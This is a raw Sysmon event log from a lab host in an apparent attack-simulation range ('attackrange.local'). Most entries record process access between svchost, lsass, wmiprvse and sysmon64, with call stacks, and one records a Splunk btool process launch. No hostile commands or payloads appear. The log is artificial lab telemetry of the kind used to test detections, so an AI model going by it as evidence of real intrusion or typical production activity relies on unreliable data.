08:41:25.605{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001929Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.543{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001928Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.543{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001927Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.543{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001926Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.527{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001925Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.527{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001924Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.527{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001923Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B5-5F84-5400-000000007F01}4056C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001922Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001921Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001920Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001919Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001918Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001917Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001916Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001915Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001914Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-169F-5F84-0500-000000007F01}6481156C:\Windows\system32\csrss.exe{5D479F2C-16B5-5F84-5400-000000007F01}4056C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001913Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001912Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-16B5-5F84-5300-000000007F01}40764072C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{5D479F2C-16B5-5F84-5400-000000007F01}4056C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001911Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.522{5D479F2C-16B5-5F84-5400-000000007F01}4056C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{5D479F2C-16B5-5F84-5300-000000007F01}4076C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list replication_port --no-log 10341000x80000000000000001910Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B5-5F84-5300-000000007F01}4076C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001909Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001908Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001907Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001906Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001905Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001904Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 